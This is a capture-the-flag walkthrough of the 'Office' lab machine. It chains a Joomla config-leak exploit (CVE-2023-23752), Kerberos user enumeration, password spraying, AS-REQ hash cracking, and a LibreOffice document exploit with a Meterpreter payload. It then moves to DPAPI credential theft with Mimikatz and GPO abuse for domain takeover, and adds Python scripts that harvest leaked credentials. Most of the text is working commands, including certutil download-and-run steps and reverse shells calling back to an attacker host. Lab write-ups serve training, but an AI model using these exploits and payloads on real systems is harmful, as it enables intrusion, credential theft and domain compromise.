[Machines][Hard] Office
Word count 1434, 2025-08-19 12:42:16
Office: a detailed penetration-testing walkthrough
1. Information gathering
1.1 Initial scan
Initial scan with Nmap:
nmap -sC -sV 10.10.11.3 --min-rate 1000
Findings:
- The web application is the Joomla CMS
- Add the host names to /etc/hosts (the file is root-owned, so append through sudo rather than a plain redirect):
echo '10.10.11.3 office.htb DC.office.htb' | sudo tee -a /etc/hosts
1.2 Directory discovery
- robots.txt discloses the site's directory layout
- The Joomla administrator panel is at:
http://10.10.11.3/administrator/index.php
1.3 Exploitation
CVE-2023-23752 (Joomla 4.0.0 through 4.2.7) lets an unauthenticated client read the application configuration through the web services API; no session cookie or API token is required:
http://10.10.11.3/api/index.php/v1/config/application?public=true
The response includes the database settings, which yield these credentials:
- Username: root
- Password: H0lOgrams4reTakIng0Ver754!
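The endpoint answers with a JSON:API document in which every configuration key sits in its own data item, so a script has to flatten the list rather than read one object. The following is an added example, not code from the original writeup: it fetches the endpoint with the standard library and pulls out the database settings. SAMPLE_RESPONSE is constructed to mirror the endpoint's shape; the database name and table prefix in it are placeholders, while the host, user and password are the ones recovered above.

```python
# Added example (not from the original writeup): harvest the DB settings that Joomla's
# unauthenticated config endpoint leaks under CVE-2023-23752.
import json
import shlex
import urllib.request

CONFIG_PATH = "/api/index.php/v1/config/application?public=true"
# Settings worth keeping: connection details plus the site secret.
WANTED = ("dbtype", "host", "user", "password", "db", "dbprefix", "secret")


def fetch_config(base_url, timeout=10):
    """GET the config endpoint with no session or token and return the parsed JSON."""
    url = base_url.rstrip("/") + CONFIG_PATH
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.load(resp)


def extract_settings(doc):
    """Flatten the JSON:API document: 'data' is a list of items whose 'attributes'
    each carry a single configuration key (plus the application id)."""
    found = {}
    for item in doc.get("data", []):
        for key, value in item.get("attributes", {}).items():
            if key in WANTED and key not in found:
                found[key] = value
    return found


def has_credentials(doc):
    """True when the document exposes a DB user and password (i.e. the bug is present)."""
    return {"user", "password"} <= extract_settings(doc).keys()


def mysql_command(settings):
    """Shell line to reuse the credentials; MYSQL_PWD keeps the password off argv."""
    return "MYSQL_PWD=%s mysql -h %s -u %s %s" % (
        shlex.quote(settings["password"]),
        shlex.quote(settings.get("host", "localhost")),
        shlex.quote(settings["user"]),
        shlex.quote(settings.get("db", "")))


# Constructed sample in the endpoint's shape; db and dbprefix values are placeholders.
SAMPLE_RESPONSE = {
    "links": {"self": "http://10.10.11.3/api/index.php/v1/config/application?public=true"},
    "data": [
        {"type": "application", "id": 224, "attributes": {"offline": False, "id": 224}},
        {"type": "application", "id": 224, "attributes": {"sitename": "Office", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"dbtype": "mysqli", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"user": "root", "id": 224}},
        {"type": "application", "id": 224,
         "attributes": {"password": "H0lOgrams4reTakIng0Ver754!", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"db": "joomla_db", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"dbprefix": "jos_", "id": 224}},
    ],
    "meta": {"total-pages": 1},
}
```

Against a live target, `extract_settings(fetch_config("http://10.10.11.3"))` returns the same dictionary the sample produces; a patched Joomla rejects the request instead of answering, so `has_credentials` is also a quick vulnerability check.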
2. Kerberos user enumeration
2.1 Install Kerbrute
Kerbrute ships as a statically linked release binary, so the Go toolchain is only needed if you build it from source:
sudo apt install golang-go
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
2.2 Enumerate users
Kerbrute sends one AS-REQ per candidate name to the KDC; names that exist are logged as VALID USERNAME, and the grep below turns that log into a clean user list:
./kerbrute_linux_amd64 userenum --dc DC.office.htb -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o recore.log
grep -oP '\S+(?=@office\.htb)' recore.log | sort | uniq > Users.txt
3. SMB share access
3.1 Validate the credentials with CrackMapExec
Spray the database password across the enumerated users and list the shares each valid account can reach (add --continue-on-success if you want every user tested after the first hit):
crackmapexec smb 10.10.11.3 -u Users.txt -p 'H0lOgrams4reTakIng0Ver754!' --shares
The password is valid for dwolfe, who can read the SOC Analysis share.
3.2 Access the share
The share name contains a space and the password contains '!', so quote both to keep the shell from splitting or history-expanding them:
smbclient '//10.10.11.3/SOC Analysis' -U 'dwolfe%H0lOgrams4reTakIng0Ver754!'
smb: \> get Latest-System-Dump-8fbc124d.pcap Main.pcap
4. Cracking the Kerberos pre-authentication hash
4.1 Analyze the PCAP
The capture contains a Kerberos AS-REQ whose PA-DATA carries PA-ENC-TIMESTAMP: a timestamp encrypted with the user's AES256 key (etype 18, aes256-cts-hmac-sha1-96). Wireshark shows the ciphertext as:
a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
4.2 Build the hashcat hash
Format: $krb5pa$18$<username>$<realm>$<cipher hex> (hashcat mode 19900, Kerberos 5 etype 18 pre-auth). The username and realm are not just labels: hashcat rebuilds the AES string-to-key salt from them, and in Active Directory that salt is the uppercase realm followed by the username (OFFICE.HTBtstark). If a hash built with a lowercase realm does not crack, rebuild it with OFFICE.HTB.
Built for user tstark (the cname of the AS-REQ):
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
4.3 Crack with Hashcat
hashcat -m 19900 hash /usr/share/wordlists/rockyou.txt
Recovered credentials:
- Username: tstark
- Password: playboy69
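Copying the three fields out of Wireshark by hand is error-prone (wrong realm case, a stray colon in the hex). The following is an added example, not code from the original writeup: it walks the DER of a raw AS-REQ, finds the PA-ENC-TIMESTAMP, and emits the mode 19900 line with the realm uppercased as the Kerberos AES salt requires. SAMPLE_AS_REQ is constructed with the small DER encoder in the block from the principal, realm and ciphertext used in this writeup; it is not the packet from the SOC Analysis capture, and the kdc-options, till and nonce values in it are arbitrary.

```python
# Added example (not from the original writeup): hashcat 19900 line from a raw AS-REQ.
# SAMPLE_AS_REQ is CONSTRUCTED here; only the ciphertext comes from the capture.

# --- minimal DER encoder (used only to construct the sample message) -----------------
def der_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, content):
    return bytes([tag]) + der_len(len(content)) + content

def der_int(v):
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def ctx(n, content):      # explicit context-specific tag [n]
    return tlv(0xA0 | n, content)

def seq(*items):
    return tlv(0x30, b"".join(items))

def gstr(s):              # KerberosString is a GeneralString (tag 0x1B)
    return tlv(0x1B, s.encode())

# --- minimal DER reader ----------------------------------------------------------------
def read_tlv(buf, pos=0):
    """(tag, content, position after this TLV) for the TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def children(content):
    pos = 0
    while pos < len(content):
        tag, value, pos = read_tlv(content, pos)
        yield tag, value

def child(content, tag):
    """Content of the first child with this tag, or None if absent."""
    return next((v for t, v in children(content) if t == tag), None)

def inner(content):
    """Unwrap an explicit [n] tag: the content of the single TLV it carries."""
    return read_tlv(content)[1]

def parse_as_req(raw):
    """cname, realm, etype and PA-ENC-TIMESTAMP ciphertext of an AS-REQ (RFC 4120 5.4.1)."""
    tag, body, _ = read_tlv(raw)
    if tag != 0x6A:                          # [APPLICATION 10] = AS-REQ
        raise ValueError("not an AS-REQ")
    kdc_req = read_tlv(body)[1]              # KDC-REQ: [1] pvno [2] msg-type [3] padata [4] req-body
    padata = child(kdc_req, 0xA3)
    if padata is None:                       # the first AS-REQ of an exchange carries no pre-auth
        raise ValueError("AS-REQ without padata: nothing to crack")
    etype = cipher = None
    for _, pa in children(inner(padata)):    # PA-DATA: [1] padata-type [2] padata-value
        if int.from_bytes(inner(child(pa, 0xA1)), "big") != 2:   # 2 = PA-ENC-TIMESTAMP
            continue
        enc = read_tlv(inner(child(pa, 0xA2)))[1]   # EncryptedData: [0] etype [1] kvno [2] cipher
        etype = int.from_bytes(inner(child(enc, 0xA0)), "big")
        cipher = inner(child(enc, 0xA2))
    if cipher is None:
        raise ValueError("AS-REQ has padata but no PA-ENC-TIMESTAMP")
    req_body = inner(child(kdc_req, 0xA4))   # KDC-REQ-BODY: [1] cname [2] realm ...
    cname = inner(child(req_body, 0xA1))     # PrincipalName: [0] name-type [1] name-string
    user = "/".join(v.decode() for _, v in children(inner(child(cname, 0xA1))))
    realm = inner(child(req_body, 0xA2)).decode()
    return {"user": user, "realm": realm, "etype": etype, "cipher": cipher}

def krb5pa_hash(fields):
    """hashcat -m 19900 line. hashcat derives the PBKDF2 salt from the realm and user
    fields; for AES etypes that salt is the UPPERCASE realm + principal (RFC 3962),
    so the realm is normalised here whatever case the capture shows."""
    if fields["etype"] != 18:
        raise ValueError("etype %d is not aes256-cts-hmac-sha1-96" % fields["etype"])
    return "$krb5pa$18$%s$%s$%s" % (fields["user"], fields["realm"].upper(), fields["cipher"].hex())

# Ciphertext from the capture; every other byte of the message is constructed.
CIPHER_HEX = ("a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a673"
              "5704d0832767af226aaa7360338a34746a00a3765386f5fc")
SAMPLE_AS_REQ = tlv(0x6A, seq(
    ctx(1, der_int(5)),                                    # pvno
    ctx(2, der_int(10)),                                   # msg-type AS-REQ
    ctx(3, seq(seq(ctx(1, der_int(2)),                     # one PA-DATA: PA-ENC-TIMESTAMP
                   ctx(2, tlv(0x04, seq(ctx(0, der_int(18)),
                                        ctx(2, tlv(0x04, bytes.fromhex(CIPHER_HEX))))))))),
    ctx(4, seq(
        ctx(0, tlv(0x03, b"\x00\x40\x81\x00\x10")),       # kdc-options (BIT STRING, arbitrary)
        ctx(1, seq(ctx(0, der_int(1)), ctx(1, seq(gstr("tstark"))))),  # cname, NT-PRINCIPAL
        ctx(2, gstr("OFFICE.HTB")),                        # realm as a Windows client sends it
        ctx(3, seq(ctx(0, der_int(2)), ctx(1, seq(gstr("krbtgt"), gstr("OFFICE.HTB"))))),
        ctx(5, tlv(0x18, b"20370913024805Z")),            # till (arbitrary)
        ctx(7, der_int(1)),                                # nonce (arbitrary)
        ctx(8, seq(der_int(18))),                          # supported etypes
    )),
))
```

`krb5pa_hash(parse_as_req(SAMPLE_AS_REQ))` yields the line used in 4.2 with the realm uppercased. For a real capture, feed the function the bytes of the AS-REQ's Kerberos payload (after the 4-byte TCP length prefix, if the exchange ran over TCP); tshark can supply the same three fields directly with `-Y 'kerberos.msg_type == 10' -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher`.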
5. Initial access
5.1 Log in to the Joomla administrator panel with tstark's credentials
5.2 Reverse shell
Generate a PowerShell reverse-shell one-liner (for example with https://www.revshells.com/). powershell -e expects the command base64-encoded as UTF-16LE, which the site's base64 PowerShell payloads already are.
Execute on the target:
powershell -e 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
5.3 User flag
type C:\Users\tstark\Desktop\user.txt
Output: 50a96aa18344772ec1c10135ff5141d8
6. Privilege escalation
6.1 Switch to tstark with RunasCs
RunasCs starts a process under another account from the cracked password and, with -r, redirects its console to a listener, which works from a non-interactive shell where runas would prompt. Download it, unpack the executable, and serve it:
wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
unzip RunasCs.zip
python3 -m http.server 80
On the target (with a listener such as nc -lvnp 10033 waiting on Kali):
cd C:\Users\Public\Downloads
certutil -urlcache -split -f http://10.10.16.15/RunasCs.exe RunasCs.exe
.\RunasCs.exe tstark playboy69 powershell -r 10.10.16.15:10033
6.2 Chisel tunnel
An internal web application listens only on the target's loopback port 8083, so expose it to Kali with a Chisel reverse port forward. On Kali:
chisel server --port 5564 --reverse
On the target:
cd C:\Users\Public\Downloads
certutil -urlcache -split -f http://10.10.16.15/chisel.exe chisel.exe
.\chisel.exe client 10.10.16.15:5564 R:8083:127.0.0.1:8083
R:8083:127.0.0.1:8083 makes the Chisel server listen on Kali's port 8083 and relay it to 127.0.0.1:8083 on the target, so the application is now reachable at:
http://127.0.0.1:8083
6.3 Exploit LibreOffice (CVE-2023-2255)
CVE-2023-2255 lets a crafted document run the supplied command when it is opened, so the payload executes as whoever opens the uploaded file. Generate the malicious ODT:
git clone https://github.com/elweth-sec/CVE-2023-2255.git
cd CVE-2023-2255
python3 CVE-2023-2255.py --cmd 'C:\Users\Public\reverse.exe' --output 'exploit.odt'
Generate the Meterpreter payload and start the handler:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.15 LPORT=10035 -f exe -o reverse.exe
msfconsole -x 'use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 10.10.16.15;set LPORT 10035;run'
Download reverse.exe on the target; the path must match the --cmd argument above:
cd C:\Users\Public
certutil -urlcache -split -f http://10.10.16.15/reverse.exe reverse.exe
Upload exploit.odt through the résumé application form. When it is opened on the target, reverse.exe runs and the handler receives a Meterpreter session.
6.4 Decrypt the credential stored by PPotts
Windows keeps saved credentials as DPAPI blobs under the user's profile. Each blob is encrypted with one of the user's master keys, which live in the Protect\<SID> folder and are themselves protected by the user's password (or, in a domain, recoverable through the domain backup key). Locate both:
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
Extract the master key with Mimikatz. The /rpc switch asks the domain controller to decrypt the master key with the domain backup key (MS-BKRP); the DC only does this for the key's owner, so run mimikatz from the session obtained through the document, not from tstark's shell:
certutil -urlcache -split -f http://10.10.16.15/mimikatz.exe mimikatz.exe
.\mimikatz.exe
In Mimikatz:
dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc
dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4" /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
The decrypted credential blob holds a saved logon for HHogan:
- Username: HHogan
- Password: H4ppyFtW183#
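The GUID passed to dpapi::masterkey is not arbitrary: every DPAPI blob records the GUID of the master key that encrypted it, so the right file under Protect\<SID>\ can be read straight out of the credential blob before mimikatz is run. The following is an added example, not code from the original writeup: it parses the DPAPI_BLOB header and derives the master-key file path. SAMPLE_CRED_FILE is constructed from the documented header layout with the master-key GUID used on this box; it is not the content of the real 84F1CAEEBF466550F4967858F9353FB4 file, and its 12 leading bytes merely stand in for the credential file's own header.

```python
# Added example (not from the original writeup): which master key does a DPAPI blob need?
# SAMPLE_CRED_FILE is CONSTRUCTED; it carries header fields only, no ciphertext.
import struct
import uuid

# Every DPAPI blob starts with a version DWORD followed by this provider GUID.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def dpapi_blob_header(data):
    """Parse the DPAPI_BLOB header found anywhere in data:
       DWORD dwVersion | GUID guidProvider | DWORD dwMasterKeyVersion | GUID guidMasterKey |
       DWORD dwFlags | DWORD dwDescriptionLen | WCHAR szDescription[] | ...
    Credential files wrap the blob in a short header of their own, so locate it by the
    provider GUID instead of assuming it starts at offset 0."""
    marker = DPAPI_PROVIDER.bytes_le
    idx = data.find(marker)
    if idx < 4:
        raise ValueError("no DPAPI blob: provider GUID not found")
    version, = struct.unpack_from("<I", data, idx - 4)
    if version != 1:
        raise ValueError("unsupported DPAPI blob version %d" % version)
    off = idx + 16
    mk_version, = struct.unpack_from("<I", data, off)
    off += 4
    mk_guid = uuid.UUID(bytes_le=data[off:off + 16])   # GUIDs are stored little-endian
    off += 16
    flags, desc_len = struct.unpack_from("<II", data, off)
    off += 8
    description = data[off:off + desc_len].decode("utf-16-le").rstrip("\x00")
    return {"version": version, "masterkey_version": mk_version,
            "masterkey_guid": str(mk_guid), "flags": flags, "description": description}


def masterkey_file(user, sid, blob):
    """Path of the master-key file to hand to dpapi::masterkey for this blob."""
    guid = dpapi_blob_header(blob)["masterkey_guid"]
    return r"C:\Users\%s\AppData\Roaming\Microsoft\Protect\%s\%s" % (user, sid, guid)


def build_sample_blob(mk_guid, description, file_header=b""):
    """Constructed blob header (version, provider, master-key GUID, flags, description)."""
    desc = description.encode("utf-16-le") + b"\x00\x00"
    return (file_header
            + struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(mk_guid).bytes_le
            + struct.pack("<II", 0, len(desc)) + desc)


# Constructed stand-in for the credential file: 12 placeholder bytes, then the blob.
SAMPLE_CRED_FILE = build_sample_blob("191d3f9d-7959-4b4d-a520-a444853c47eb",
                                     "Local Credential Data",
                                     file_header=b"\x01\x00\x00\x00" + b"\x00" * 8)
PPOTTS_SID = "S-1-5-21-1199398058-4196589450-691661856-1107"
```

`masterkey_file("PPotts", PPOTTS_SID, SAMPLE_CRED_FILE)` returns exactly the path used in the dpapi::masterkey command above. On the box itself, `dpapi::blob /in:<file>` or `dpapi::cred /in:<file>` without /masterkey prints the same guidMasterKey, which is the quick way to confirm you are decrypting the right master key when the Protect folder holds several.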
7. Domain Administrator
7.1 Connect with Evil-WinRM through a SOCKS tunnel
Evil-WinRM is run through a Chisel reverse SOCKS proxy. Add the proxy to /etc/proxychains4.conf (Chisel's R:socks listens on 127.0.0.1:1080 by default, so the entry is socks5 127.0.0.1 1080):
vim /etc/proxychains4.conf
On Kali:
chisel server -p 9002 --reverse --socks5
On the target:
cd C:\Users\Public\Downloads
.\chisel.exe client 10.10.16.15:9002 R:socks
Then connect as HHogan through the proxy (use the DC's address rather than 127.0.0.1, which proxychains excludes as localnet by default), for example:
proxychains4 evil-winrm -i 10.10.11.3 -u HHogan -p 'H4ppyFtW183#'
7.2 Escalate with SharpGPOAbuse
This step relies on HHogan having write access to the Default Domain Controllers Policy GPO; confirm it first from the WinRM session with Get-GPPermission -Name "Default Domain Controllers Policy" -All. SharpGPOAbuse then adds an immediate scheduled task to that GPO, and the task runs as SYSTEM on every computer the GPO applies to, here the domain controller. Download SharpGPOAbuse:
wget https://github.com/byronkg/SharpGPOAbuse/releases/download/1.0/SharpGPOAbuse.exe
On the target (in the Evil-WinRM session):
certutil -urlcache -split -f http://10.10.16.15/SharpGPOAbuse.exe SharpGPOAbuse.exe
Add a computer task whose command is a base64-encoded PowerShell reverse shell:
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "s-h4ck13" --Author office\Administrator --Command "cmd.exe" --Arguments "/c powershell -e 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" --GPOName "Default Domain Controllers Policy" --Force
gpupdate /force
Immediate tasks fire on the next Group Policy refresh; gpupdate /force triggers that refresh on the DC right away, and the listener receives a SYSTEM shell. The task remains in the GPO afterwards and should be removed once you are done.
7.3 Root flag
type C:\Users\Administrator\Desktop\root.txt
Output: 5224918ae4a25196417ca0a559a084e6
8. Key references
- Extracting passwords with Windows DPAPI: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
- Mimikatz DPAPI module: https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey